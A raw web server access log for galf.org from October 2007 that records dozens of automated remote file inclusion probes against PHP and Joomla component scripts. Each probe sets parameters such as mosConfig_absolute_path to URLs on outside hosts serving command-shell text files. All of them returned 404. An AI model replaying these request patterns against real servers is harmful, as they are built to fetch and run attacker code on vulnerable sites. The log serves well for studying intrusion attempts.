201.122.11.226 - - [29/Oct/2007:13:48:11 -0700] "GET /logs/access_071022.log/century/raid/announcements.php?phpraid_dir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:48:13 -0700] "GET /logs/access_070820.log/century/raid/announcements.php?phpraid_dir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.93.240.191 - - [29/Oct/2007:13:49:42 -0700] "GET /mosConfig_absolute_path=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
81.93.240.191 - - [29/Oct/2007:13:49:42 -0700] "GET /logs/mosConfig_absolute_path=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "galf.org"
85.234.133.173 - - [29/Oct/2007:13:49:48 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.133.173 - - [29/Oct/2007:13:49:48 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.119.200.212 - - [29/Oct/2007:13:49:53 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [29/Oct/2007:13:49:54 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.174.85.9 - - [29/Oct/2007:13:50:32 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
202.174.85.9 - - [29/Oct/2007:13:50:32 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
209.50.235.227 - - [29/Oct/2007:13:50:33 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
209.50.235.227 - - [29/Oct/2007:13:50:33 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:50:44 -0700] "GET /logs/access_070820.log/index.php?pag=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:50:45 -0700] "GET /index.php?pag=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:50:45 -0700] "GET /logs/index.php?pag=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [29/Oct/2007:13:50:56 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.119.200.212 - - [29/Oct/2007:13:50:57 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
193.110.43.66 - - [29/Oct/2007:13:50:57 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.110.43.66 - - [29/Oct/2007:13:50:57 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.111.176.32 - - [29/Oct/2007:13:50:59 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.32 - - [29/Oct/2007:13:51:00 -0700] "GET /modules/My_eGallery/index.php?basepath=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.24.226 - - [29/Oct/2007:13:51:01 -0700] "GET /logs/ HTTP/1.0" 200 5212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.110.43.66 - - [29/Oct/2007:13:51:32 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
193.110.43.66 - - [29/Oct/2007:13:51:33 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
209.50.235.227 - - [29/Oct/2007:13:51:43 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
209.50.235.227 - - [29/Oct/2007:13:51:43 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
65.98.57.98 - - [29/Oct/2007:13:52:06 -0700] "GET /logs/access_071001.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.23.164 - - [29/Oct/2007:13:53:41 -0700] "GET /logs/?M=A HTTP/1.0" 200 5212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
194.183.14.23 - - [29/Oct/2007:13:53:50 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.183.14.23 - - [29/Oct/2007:13:53:51 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:13:53:59 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:13:54:00 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.228.196 - - [29/Oct/2007:13:54:23 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.228.196 - - [29/Oct/2007:13:54:25 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.246.32.27 - - [29/Oct/2007:13:54:31 -0700] "GET /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://72.1.85.234/cmdinterface.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
203.151.232.105 - - [29/Oct/2007:13:54:32 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:13:54:32 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:13:54:34 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.15.10.71 - - [29/Oct/2007:13:54:35 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.202.2.69 - - [29/Oct/2007:13:54:36 -0700] "GET //login.php?dir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.202.2.69 - - [29/Oct/2007:13:54:36 -0700] "GET //login.php?dir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.202.2.69 - - [29/Oct/2007:13:54:36 -0700] "GET //login.php?dir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:54:54 -0700] "GET /logs/access_070924.log//include.php?path[docroot]=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:54:56 -0700] "GET /logs//include.php?path[docroot]=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [29/Oct/2007:13:55:05 -0700] "GET /logs//index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [29/Oct/2007:13:55:05 -0700] "GET //index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.126.117.130 - - [29/Oct/2007:13:55:36 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.117.130 - - [29/Oct/2007:13:55:36 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.213.175 - - [29/Oct/2007:13:56:40 -0700] "GET /index.php?file=http://ownz-you.com/kiddies/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.75.226.101 - - [29/Oct/2007:13:57:21 -0700] "GET /index.php?file=http://ownz-you.com/kiddies/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
75.126.117.130 - - [29/Oct/2007:13:58:07 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
75.126.117.130 - - [29/Oct/2007:13:58:07 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.36.175.10 - - [29/Oct/2007:13:58:08 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.175.10 - - [29/Oct/2007:13:58:08 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.50.235.227 - - [29/Oct/2007:13:58:14 -0700] "GET //index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
209.50.235.227 - - [29/Oct/2007:13:58:14 -0700] "GET /logs//index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.193.228.196 - - [29/Oct/2007:13:58:19 -0700] "GET /logs//index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.228.196 - - [29/Oct/2007:13:58:20 -0700] "GET //index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:13:58:28 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:13:58:28 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.29.69.119 - - [29/Oct/2007:13:58:34 -0700] "GET /index.php?file=http://ownz-you.com/kiddies/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.117.130 - - [29/Oct/2007:13:58:38 -0700] "GET /logs//index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.117.130 - - [29/Oct/2007:13:58:38 -0700] "GET //index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:58:45 -0700] "GET /logs/access_070826.log//include.php?path[docroot]=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.69.119 - - [29/Oct/2007:13:58:57 -0700] "GET /index.php?file=http://ownz-you.com/kiddies/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.15.10.71 - - [29/Oct/2007:13:59:03 -0700] "GET /logs//index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:13:59:03 -0700] "GET //index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.175.10 - - [29/Oct/2007:13:59:38 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.36.175.10 - - [29/Oct/2007:13:59:39 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
65.90.251.169 - - [29/Oct/2007:14:00:17 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.90.251.169 - - [29/Oct/2007:14:00:18 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.113.226.82 - - [29/Oct/2007:14:01:02 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [29/Oct/2007:14:01:03 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:01:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:01:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.175.10 - - [29/Oct/2007:14:02:01 -0700] "GET /logs//index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.175.10 - - [29/Oct/2007:14:02:01 -0700] "GET //index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.90.251.169 - - [29/Oct/2007:14:02:03 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
65.90.251.169 - - [29/Oct/2007:14:02:03 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
217.113.226.82 - - [29/Oct/2007:14:02:08 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
217.113.226.82 - - [29/Oct/2007:14:02:09 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
85.234.133.173 - - [29/Oct/2007:14:03:37 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.133.173 - - [29/Oct/2007:14:03:37 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.93.57.207 - - [29/Oct/2007:14:04:16 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://econfence.de/login/engine/db/lollo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [29/Oct/2007:14:04:16 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://econfence.de/login/engine/db/lollo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.196.84 - - [29/Oct/2007:14:06:42 -0700] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:06:42 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.196.84 - - [29/Oct/2007:14:06:42 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:06:42 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.196.84 - - [29/Oct/2007:14:06:43 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.234.133.173 - - [29/Oct/2007:14:07:19 -0700] "GET /logs/access_070827.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.190.1.12 - - [29/Oct/2007:14:07:21 -0700] "GET /logs/access_070917.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.241.196.84 - - [29/Oct/2007:14:07:23 -0700] "GET /logs/access_070716.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.190.1.12 - - [29/Oct/2007:14:07:26 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.190.1.12 - - [29/Oct/2007:14:07:26 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
69.93.209.250 - - [29/Oct/2007:14:08:16 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:14:08:16 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.113.226.82 - - [29/Oct/2007:14:11:06 -0700] "GET /logs//index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [29/Oct/2007:14:11:08 -0700] "GET //index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.90.251.169 - - [29/Oct/2007:14:11:09 -0700] "GET /logs//index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.90.251.169 - - [29/Oct/2007:14:11:12 -0700] "GET //index2.php?x=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.133.173 - - [29/Oct/2007:14:11:54 -0700] "GET /logs/access_070903.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:14:11:56 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:14:12:26 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:12:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.73.171 - - [29/Oct/2007:14:12:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:12:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:12:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.191.14.148 - - [29/Oct/2007:14:13:04 -0700] "GET /index.php?file=http://ownz-you.com/kiddies/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.33.217 - - [29/Oct/2007:14:13:22 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.33.217 - - [29/Oct/2007:14:13:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:15:23 -0700] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:15:23 -0700] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:15:23 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
